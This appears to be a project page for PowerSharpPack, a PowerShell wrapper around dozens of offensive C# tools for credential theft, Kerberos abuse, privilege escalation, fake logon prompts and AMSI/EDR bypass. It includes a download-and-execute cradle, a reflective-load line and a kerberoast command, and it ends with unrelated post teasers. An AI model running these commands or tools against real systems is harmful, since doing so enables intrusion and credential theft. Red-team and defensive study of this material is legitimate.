PowerSharpPack is a tool with many useful offensive CSharp Projects warped into Powershell for easy usage.
Why? In my personal opinion offensive Powershell is not dead because of AMSI, Script-block-logging, Constrained Language Mode or other protection features. Any of these mechanisms can be bypassed. Since most new innovative offensive security projects are written in C# I decided to make them usable in powershell as well.
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary)
.Its a very easy but for many repos time consuming process.
Which tools are included?
Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
@Credit to: https://github.com/eladshamir/Internal-Monologue
Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.
@Credit to: https://github.com/GhostPack/Seatbelt
.NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.
@Credit to: https://github.com/djhohnstein/SharpWeb
Creates a local RW section in UrbanBishop and then maps that section as RX into a remote process. Shellcode loading made easy.
@Credit to: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp is a C# port of various PowerUp functionality.
@Credit to: https://github.com/GhostPack/SharpUp
Rubeus is a C# toolset for raw Kerberos interaction and abuses.
@Credit to: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
Windows persistence toolkit written in C#.
@Credit to: https://github.com/fireeye/SharPersist
C# implementation of harmj0y’s PowerView
@Credit to: https://github.com/tevora-threat/SharpView
Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz
@Credit to: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless allows for the copying of locked files.
@Credit to: https://github.com/GhostPack/Lockless
.NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins.
@Credit to: https://github.com/djhohnstein/SharpChromium
SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.
@Credit to: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
Enumerate all network shares in the current domain. Also, can resolve names to IP addresses.
@Credit to: https://github.com/djhohnstein/SharpShares
Find specific users in active directory via their username and logon IP address
@Credit to: https://github.com/HunnicCyber/SharpSniper
SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.
@Credit to: https://github.com/jnqpblc/SharpSpray
Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities
@Credit to: https://github.com/rasta-mouse/Watson
Find vulnerabilities in AD Group Policy
@Credit to: https://github.com/l0ss/Grouper2
A tool to elevate privilege with Windows Tokens
@Credit to: https://github.com/0xbadjuju/Tokenvator
Search tool to find specific files containing specific words, i.e. files containing passwords.
@Credit to: https://github.com/vivami/SauronEye
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
PowerSharpPack -seatbelt -Command "AMSIProviders"
If you want to pass multiple parameters to the binary you can just use quotation marks like:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
If you dont want to load all binaries for reasons you can use the per binary Powershell scripts located in the PowerSharpBinaries folder.
Projects which are also available as standalone powershell script:
Simple C# for checking for the existence of credential files related to AWS, Microsoft Azure, and Google Compute.
@Credit to: https://github.com/chrismaddalena/SharpCloud
SSDP Service Discovery
@Credit to: https://github.com/rvrsh3ll/SharpSSDP
DAFT: Database Audit Framework & Toolkit
@Credit to: https://github.com/NetSPI/DAFT
Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory environments
@Credit to: https://github.com/FatRodzianko/Get-RBCD-Threaded
A C# tool for enumerating remote access policies through group policy.
@Credit to: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
Computer object takeover through Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity)
@Credit to: https://github.com/pkb1s/SharpAllowedToAct
.NET 4.0 Project to interact with video, audio and keyboard hardware.
@Credit to: https://github.com/djhohnstein/WireTap
C# Clipboard Monitor
@Credit to: https://github.com/slyd0g/SharpClipboard
Discover Printers + check for vulns
@Credit to: https://github.com/rvrsh3ll/SharpPrinter
Tool to create hidden registry keys.
@Credit to: https://github.com/outflanknl/SharpHide
PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.
@Credit to: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user’s edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
@Credit to: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump is a C# port of PowerSploit’s Out-Minidump.ps1 functionality.
@Credit to: https://github.com/GhostPack/SharpDump
C# Data Collector for the BloodHound Project, Version 3
@Credit to: https://github.com/BloodHoundAD/SharpHound3
SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike.
@Credit to: https://github.com/Pickfordmatt/SharpLocker
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
@Credit to: https://github.com/FortyNorthSecurity/EyeWitness
Fake Windows logon screen to steal passwords
@Credit to: https://github.com/bitsadmin/fakelogonscreen
PowerShell Runspace Post Exploitation Toolkit
@Credit to: https://github.com/Cn33liz/p0wnedShell
SafetyKatz is a combination of slightly modified version of @gentilkiwi’s Mimikatz project and @subTee’s .NET PE Loader I modified this one again with my own obfuscated Mimikatz Version.
@Credit to: https://github.com/GhostPack/SafetyKatz
Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofer/man-in-the-middle tool .
@Credit to: https://github.com/Kevin-Robertson/InveighZero
SharpSploit is a .NET post-exploitation library written in C#.
@Credit to: https://github.com/cobbr/SharpSploit
A tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax ).
@Credit to: https://github.com/SnaffCon/Snaffler
itm4ns Printspoofer in C#.
@Credit to: https://github.com/BeichenDream/BadPotato
Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.
@Credit to: https://github.com/Flangvik/BetterSafetyKatz
C# Port of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands.
@Credit to: https://github.com/b4rtik/SharpKatz
C# tool to discover low hanging fruits.
@Credit to: https://github.com/EncodeGroup/Gopher
IOXIDResolver from AirBus Security/PingCastle.
@Credit to: https://github.com/vletoux/pingcastle/
A method of bypassing EDR’s active projection DLL’s by preventing entry point exection.
@Credit to: https://github.com/CCob/SharpBlock
This Program creates a login prompt to gather username and password of the current user. This project allows red team to phish username and password of the current user without touching lsass and having adminitrator credentials on the system.
@Credit to: https://github.com/shantanu561993/SharpLoginPrompt
Retrieves data (contacts, emails, history, cookies and credentials) from Thunderbird and Firefox.
Extracts data from the Windows Sticky Notes database. Works on Windows 10 Build 1607 and higher. This project doesn’t rely on any external dependencies.
@Credit to: https://github.com/V1V1/SharpScribbles
Fileless lateral movement tool that relies on ChangeServiceConfigA to run command.
@Credit to: https://github.com/Mr-Un1k0d3r/SCShell
A sharpen version of CrackMapExec. Use quotation marks if you want to pass multiple parameters to the binary.
@Credit to: https://github.com/cube0x0/SharpMapExec
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…
This took me like 4 days (+2 days for an update), but I got it…
MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…